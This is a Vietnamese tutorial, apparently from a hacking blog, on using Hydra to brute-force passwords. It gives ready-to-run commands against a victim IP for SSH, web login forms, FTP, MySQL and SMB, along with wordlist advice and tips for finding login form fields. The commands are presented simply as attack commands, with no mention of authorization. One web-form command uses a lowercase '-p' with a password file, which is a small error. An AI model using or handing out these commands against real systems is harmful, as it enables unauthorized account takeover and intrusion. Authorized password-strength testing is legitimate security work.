Hydra là gì?
Hydra là một trong những công cụ thường được Hacker và các nhà nghiên cứu bảo mật sử dụng. Đây công cụ có sẵn trong Kali Linux các phiên bản và được dùng để thực hiện các cuộc tấn công Brute Force Password hay còn gọi là dò mật khẩu.
Trong bài viết này, mình sẽ chỉ cho bạn cách thực hiện một cuộc tấn công brute force với Hydra trên Máy chủ FTP, MYSQL, SMB, SMTP, SSH và Web Login Auth.
Mình có bài phân tích về Brute Force và cách ngăn chặn rất chi tiết, nếu bạn muốn tìm hiểu sâu về phương thức này thì nên đọc kỹ bài này.
Wordlist
Khi tấn công Brute Force, bạn cần có sẵn 1 danh sách các ký tự dùng để dò đoán username và password. Bạn nên sử dụng WordList bộ Kaonashi hoặc bộ Worldlist do AnonyViet chia sẻ.
Username WordList:
Hydra cho phép bạn Brute Force cả username, nếu bạn không biết tên đăng nhập, bạn cũng có thể thử WorldList, để sử dụng Hydra tìm Username, bạn phải sửa đổi tham số -l user thành -L user.txt (user.txt là file chứa danh sách tên username dùng để dò mật khẩu).
Password WordList
Là danh sách các Password bạn sẽ dùng để đăng nhập thử vào trang Web hay SSH, FTP…., như đã nói ở trên mình thường dùng bộ Password WordList của AnonyViet sưu tầm.
Cách dùng Hydra để dò mật khẩu các dịch vụ mạng
Brute Force SSH bằng Hydra
Lệnh tấn công:
hydra -l user -P passwords.txt IP_VICTIM ssh
hoặc
hydra -L user.txt -P passwords.txt IP_VICTIM ssh
Brute Force trang Login Website bằng Hydra
Lệnh tấn công:
hydra -l user -p passwords.txt IP_VICTIM http-post-form '/path/login:username_field&password_field=^PASS^:wrong'
Thay thế /path/login:username_field&password_field= bằng đường dẫn và file đăng nhập trong link HTML
wrong: nếu từ này xuất hiện trên trang, thì mật khẩu chưa chính xác
Cách lấy Username Field và Password Field:
- Username Field: mở Firefox nhấn F12 -> Network -> Send Login.
- Password Field: mở Firefox nhấn Firefox F12 -> Network -> Send Login.
Hoặc bạn có thể dùng Burp Suite để bắt Request.
Brute Force FTP
Lệnh tấn công:
hydra -l user -P passwords.txt IP_VICTIM ftp
Brute Force MYSQL
hydra -l user -P passwords.txt IP_VICTIM mysql
Brute Force SMB
hydra -l user -P passwords.txt IP_VICTIM smb
Trên Kali Linux cũng có Hydra phiên bản có giao diện, có thể sẽ dễ sử dụng hơn so với Hydra dòng lệnh để Brute Force, nhưng theo mình bạn nên tập thói quen dùng dòng lệnh để tập làm quen trên Linux và khi cài Hydra lên các hệ điều hành khác bạn có thể dễ dàng sử dụng. Hiện nay cũng có Hydra phiên bản Windows, nhưng mình chưa sử dụng, bạn nào dùng rồi thì comment bên dưới nha.